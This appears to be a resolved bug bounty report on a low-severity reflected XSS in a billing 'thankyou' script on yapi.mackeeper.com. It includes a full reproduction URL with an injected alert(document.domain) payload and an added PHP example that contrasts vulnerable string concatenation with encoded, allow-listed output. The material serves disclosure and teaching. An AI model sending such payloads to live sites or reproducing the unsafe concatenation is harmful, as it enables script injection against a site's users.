RXSS on thankyou.pixels.php (yapi.mackeeper.com)

Low
Clario
Submitted None

Team Summary

Official summary from Clario

### Summary

Reflected Cross-Site Scripting attack on the yapi.mackeeper.com domain. The problem is in the `/billing/thankyou.pixels.php` script, which passes the value of a vulnerable parameter directly into the HTML code of the page.

### Step to reproduce

`https://yapi.mackeeper.com/billing/thankyou.pixels.php?source=ppg&amount=118.800000&orderid=930799331063'}});</script><script>alert(document.domain)</script>%3balert(1)%2f%2f663&customerid=3250462&quantity=1&clid=185.11394286.1432610720.6.mzb&affid=mzb_2416&xprepay=bn_mk_ppi_kyloren_ppg&productId=29&item1=11559&amount1=118.800000&status=paid`

Reported by sec0ndw0lf
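
The class of fix for the issue summarized above, as an added example that is not Clario's code and not part of the original report. It assumes, from the shape of the reported `orderid` value, that the parameter was written into a JavaScript string inside an inline `<script>` block; `track()`, `render_pixel_unsafe()`, `render_pixel_safe()` and `js_literal()` are hypothetical names.

```php
<?php
// Added example: hypothetical reconstruction, not Clario's code.
// track() and all function names here are invented for illustration.

// Vulnerable shape: request value concatenated into a JS string literal.
function render_pixel_unsafe(string $orderId): string
{
    return "<script>track({order: {id: '" . $orderId . "'}});</script>";
}

// Context-aware encoding for a value placed inside an inline <script>.
// The JSON_HEX_* flags emit <, >, &, ' and " as \uXXXX escapes, so the
// value can close neither the string literal nor the <script> element.
function js_literal($value): string
{
    $flags = JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT
           | JSON_THROW_ON_ERROR;
    return json_encode($value, $flags);
}

// Hardened form: allow-list the input first, then encode for the context.
function render_pixel_safe(string $orderId): string
{
    // Assumption: order IDs are purely numeric, as in the report's URL.
    if (!preg_match('/\A[0-9]{1,32}\z/', $orderId)) {
        throw new InvalidArgumentException('invalid orderid');
    }
    $data = ['order' => ['id' => $orderId]];
    return '<script>track(' . js_literal($data) . ');</script>';
}

// The breakout part of the orderid value from the report's URL.
$reported = "930799331063'}});</script><script>alert(document.domain)</script>";

echo render_pixel_unsafe($reported), "\n";   // value escapes its context
echo js_literal($reported), "\n";            // same value, encoded as data
try {
    render_pixel_safe($reported);
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), "\n";
}
echo render_pixel_safe('930799331063'), "\n"; // legitimate order ID
```

Encoding alone neutralizes the reflected value; the allow-list additionally rejects malformed order IDs before they reach the template.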

Report Details

Additional information and metadata

State

Closed

Substate

Resolved

Bounty

$75.00

Submitted

Weakness

Cross-site Scripting (XSS) - Reflected